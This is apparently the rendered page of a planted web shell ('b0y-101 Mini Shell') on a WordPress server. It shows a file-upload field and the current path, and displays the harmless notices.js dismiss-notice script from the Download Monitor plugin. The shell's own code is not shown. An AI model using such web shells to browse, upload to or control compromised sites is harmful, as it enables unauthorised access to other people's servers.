b0y-101 Mini Shell


Current Path : E:/www3/chiangrai/wp-content/plugins/download-monitor/assets/js/
File Upload :
Current File : E:/www3/chiangrai/wp-content/plugins/download-monitor/assets/js/notices.js

jQuery( function ( $ ) {

	$( '.dlm-notice.is-dismissible' ).on( 'click', '.notice-dismiss', function ( event ) {
		//$( '#dlm-ajax-nonce' ).val()
		var notice_el = $( this ).closest( '.dlm-notice' );

		var notice = notice_el.attr( 'id' );
		var notice_nonce = notice_el.attr( 'data-nonce' );
		$.post(
			ajaxurl,
			{
				action: 'dlm_dismiss_notice',
				nonce: notice_nonce,
				notice: notice
			},
			function ( response ) {
			}
		)
	} );

} );

Copyright © 2019 by b0y-101